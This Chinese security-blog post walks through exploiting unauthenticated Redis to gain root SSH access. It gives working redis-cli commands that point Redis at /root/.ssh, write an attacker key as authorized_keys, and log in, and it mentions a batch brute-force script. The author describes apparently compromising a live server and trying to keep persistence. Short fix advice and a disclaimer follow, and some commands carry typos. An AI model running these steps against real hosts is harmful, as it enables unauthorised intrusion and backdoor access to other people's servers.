【实战】redis未授权实现ssh登录-安全小天地

0x01 漏洞描述

Redis 默认情况下，会绑定在 0.0.0.0:6379，如果没有进行采用相关的策略，比如添加防火墙规则避免其他非信任来源 ip 访问等，这样将会将 Redis 服务暴露到公网上，如果在没有设置密码认证（一般为空）的情况下，会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。

0x02 相关阅读

-Redis未授权利用

2023年2月1日 13:53

015813

0x03 SSH公钥创建

redis常用命令

config set dir /home.test 设置工作目录
config set dbfilename redis.rdb 设置备份文件名
config get dir 检查工作目录是否设置成功
coonfig get dbfilename 检查备份文件名是否设置成功
save 进行备份操作

写ssh-keygen公钥，连接成功（开启22端口且权限够大的情况下写公钥）

总得流程思路

config set dir /root/.ssh #切换到密钥路径 
config set dbfilename authorized_keys #写入文件名
set miyao "\n\n\n你的密钥\n\n\n" #写入密钥
save #保存
ssh -i id_rse root@IP #连接ssh

0x04 渗透流程

测试未授权，以及爆破弱口令

批量测试脚本，使用python2运行，需要测试的ip放入redis.txt中

此处内容已隐藏，请评论后刷新页面查看.

更新版本，支持多线程，python3

使用命令进行连接，因为存在密码，这里需要使用-a参数

redis-cli -h xxx.xx.xx.x -a 123456

创建公钥

在攻击机中生成ssh公钥和私钥，密码设置为空：

ssh-keygen -t rsa

ssh-keygen -t rsa,创建期间直接回车，在/root/.ssh目录下面会自动创建两个文件，分别是本地的公钥和私钥:

导出key

(echo -e "\n\n";cat id_rsa.pub;echo -e "\n\n") > key.txt

把公钥key写入redis的键值key中

cat key.txt|redis-cli -h xx.xx.xx.xx -x set key

设置保存的文件路径,这里在redis里面设置

config  set  dir /root/.ssh

通过ssh公钥认证登录目标机器

ok，至此成功拿下服务器

可惜就是，宝塔面板一直登录不上，没办法继续做权限维持

0x05 总结

本文就是利用redis未授权，进行ssh公钥写入，然后远程登录获取权限

因为该站点暂无网站搭建等，没办法进行shell，点到为止吧

修复建议

1、禁止外部访问Redis服务端口;

2、禁止使用root权限启动redis服务;

3、配置安全组，限制可连接Redis服务器的IP。

参考文章：https://blog.51cto.com/u_15878568/5955724

安全小天地的技术文章仅供参考，此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等（包括但不限于）进行检测或维护参考，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。安全小天地拥有对此文章的修改、删除和解释权限，如转载或传播此文章，需保证文章的完整性，未经允许，禁止转载！本文所提供的工具仅用于学习，禁止用于其他，请在24小时内删除工具文件！！！访问本博客请务必遵守有关互联网的相关法律、规定与规则。一旦您访问本博客，即表示您已经知晓并接受了此声明通告。详情见本站的“免责声明”如果有侵权之处请第一时间联系我们删除。敬请谅解!E-mail：anquanclub@foxmail.com

THE END